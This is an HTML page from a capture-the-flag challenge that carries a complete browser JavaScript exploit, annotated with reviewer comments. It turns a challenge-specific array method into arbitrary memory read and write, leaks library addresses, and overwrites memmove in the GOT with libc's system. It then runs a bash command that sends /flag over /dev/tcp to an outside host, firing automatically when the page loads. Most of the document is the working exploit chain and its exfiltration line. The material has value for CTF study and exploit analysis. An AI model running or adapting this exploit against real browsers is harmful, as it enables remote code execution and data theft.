<!DOCTYPE html> | |
<html> | |
<!-- flag{fire_just_makes_the_blaze_better} --> | |
<head> | |
<meta charset="utf-8"> | |
<script src="utils.js"></script> | |
<title></title> | |
<script type="text/javascript"> | |
// Proof-of-concept from a CTF challenge page. It depends on a non-standard
// `arr.blaze()` method that is not defined anywhere in this file, and on
// `log` and `Int64` from the utils.js loaded in <head>. Nearly every binding
// below is an implicit global (no var/let/const), so running this pollutes the
// page's global scope. The constants from `xul_base` onward are offsets for one
// specific build; on any other build the arithmetic yields meaningless values.
function exploit() { | |
// The allocation order here is part of the technique: the scan further down
// only finds its marker if these buffers end up laid out next to each other,
// so these statements must not be reordered.
arr = [0x11223344]; | |
ab = new ArrayBuffer(32); | |
overwrite_len = new Uint32Array(ab); | |
overwrite_len[0] = 0x77777777; | |
victim_ab = new ArrayBuffer(32); | |
victim = new Uint32Array(victim_ab); | |
victim[0] = 0x88888888; | |
log("starting"); | |
// Challenge-specific primitive; what it does is not visible in this file. On a
// stock engine `arr.blaze` is undefined and this line throws a TypeError.
arr.blaze(); | |
// Index 7 is well past the single declared element of `arr`.
arr[7] = 0x10000; | |
// `overwrite_len` was created with 8 elements (32 bytes / 4). Scanning up to
// index 1000 only makes sense if the two lines above enlarged its length —
// presumably the effect of blaze(); cannot be confirmed from here. The marker
// searched for is the value stored in victim[0].
var ptr_overwrite_idx = -1; | |
for (var i = 0; i < 1000; i++) { | |
if (overwrite_len[i] == 0x88888888) { | |
overwrite_len[i] = 0x98888888; | |
ptr_overwrite_idx = i; | |
break; | |
} | |
} | |
log(`ptr_overwrite_idx ${ptr_overwrite_idx} `); | |
// Marker not found: give up quietly. The globals created above are left in
// place and nothing beyond the log line signals the failure.
if (ptr_overwrite_idx == -1) { | |
return; | |
} | |
// from https://github.com/phoenhex/files/blob/master/exploits/share-with-care/exploit.js | |
// Read/write helpers layered on the corrupted view. `prepare` stores the two
// halves of `addr` at fixed negative offsets (-8, -7) from the marker index and
// returns a fresh view over victim_ab; the other three methods all route
// through it. The offsets encode an assumed object layout that is never
// checked. Combining halves with `256 ** 4 *` produces a JS double, so values
// above 2^53 lose precision. `Int64`, `rshift`, `lower`, `upper` and `toInt`
// come from utils.js; rshift() presumably strips a tag bit — not verifiable here.
memory = { | |
prepare: function(addr, typed_array) { | |
x = new Int64(addr); | |
x.rshift(); | |
overwrite_len[ptr_overwrite_idx - 8] = x.lower(); | |
overwrite_len[ptr_overwrite_idx - 7] = x.upper(); | |
return new typed_array(victim_ab); | |
}, | |
write: function(addr, data) { | |
view = memory.prepare(addr, Uint32Array); | |
// Missing semicolon; ASI terminates the statement, so it is harmless.
x = new Int64(data) | |
view[0] = x.lower(); | |
view[1] = x.upper(); | |
}, | |
read: function(addr) { | |
view = memory.prepare(addr, Uint32Array); | |
return new Int64(view[0] + 256 ** 4 * view[1]); | |
}, | |
// Same as read(), but keeps only the low 16 bits of the high word.
readWithTag: function(addr) { | |
view = memory.prepare(addr, Uint32Array); | |
return new Int64(view[0] + 256 ** 4 * (view[1] & 0xffff)); | |
} | |
} | |
// Attaches two expando properties to victim_ab, then reads a 64-bit value from
// offsets -13/-12 relative to the marker, follows it once with readWithTag, and
// returns the value 40 bytes (5 * 8) past that. Every offset here assumes a
// particular object layout — TODO confirm against the target build.
function leak_native(nat_func) { | |
victim_ab.yolo = nat_func; | |
victim_ab.haha = 0x13391339; | |
slots = overwrite_len[ptr_overwrite_idx - 13] * 2 ** 32 + overwrite_len[ptr_overwrite_idx - 12]; | |
slots_0 = (memory.readWithTag(slots).toInt()); | |
return memory.read(slots_0 + 5 * 8).toInt() | |
} | |
nat_func = leak_native(Date.now); | |
log("[+] Date.now @ " + nat_func.toString(16) + "\n"); | |
// Build-specific offsets: one base is derived from the leaked address and the
// rest are fixed deltas from it.
xul_base = nat_func - 0x49c7ab0; | |
memmove_got = xul_base + 0x0000818b220; | |
dup_got = xul_base + 0x0000818b738; | |
// NOTE(review): `dup_libc` is an Int64 object here, whereas leak_native converts
// with .toInt() before doing arithmetic. Whether `dup_libc - 0xf7940` yields a
// number depends on Int64 defining valueOf in utils.js — verify there.
dup_libc = memory.read(dup_got); | |
libc_base = dup_libc - 0xf7940; | |
system_libc = libc_base + 0x45390; | |
// The second argument to log() is defined in utils.js; its meaning is not
// visible in this file.
log("[+] xul base @ " + xul_base.toString(16), true); | |
log("[+] memmove@got @ " + memmove_got.toString(16), true); | |
log("[+] libc_base@libc_@_" + libc_base.toString(16), true); | |
log("[+] system@libc @ " + system_libc.toString(16), true); | |
// Copies `cmd` into a 100-byte buffer as single-byte char codes. The explicit
// terminator is redundant (typed arrays are zero-filled) but harmless. Note the
// same `var i` is redeclared from the loop above; legal for `var`.
var target = new Uint8Array(100); | |
var cmd = "bash -ic 'cat /flag > /dev/tcp/my.host/12345' &"; | |
for (var i = 0; i < cmd.length; i++) { | |
target[i] = cmd.charCodeAt(i); | |
} | |
target[cmd.length] = 0; | |
// Saves the current entry, replaces it, triggers copyWithin (presumably because
// that bottoms out in the replaced routine — inferred, not shown here), then
// restores the saved entry. The restore passes an Int64 object back into
// write(), which relies on `new Int64(...)` accepting an Int64 — confirm in
// utils.js. From a monitoring standpoint, the observable side effect is a shell
// spawned from the browser process that reads /flag and opens an outbound TCP
// connection, which is a strong detection signal on its own.
memmove_backup = memory.read(memmove_got); | |
memory.write(memmove_got, system_libc); | |
target.copyWithin(0, 1); | |
memory.write(memmove_got, memmove_backup); | |
} | |
// Runs as soon as the script is parsed, before <body> exists. Nothing guards
// against a missing `blaze()` method, so on a stock engine this call throws a
// TypeError at `arr.blaze()` and leaves the implicit globals created before it.
exploit(); | |
</script> | |
</head> | |
<body> | |
</body> | |
</html> | |
<!-- 0x00007f9c4b7a6138│+0xc8: 0x00007f9c4b7a70a0 → 0x8899001177889900 --> |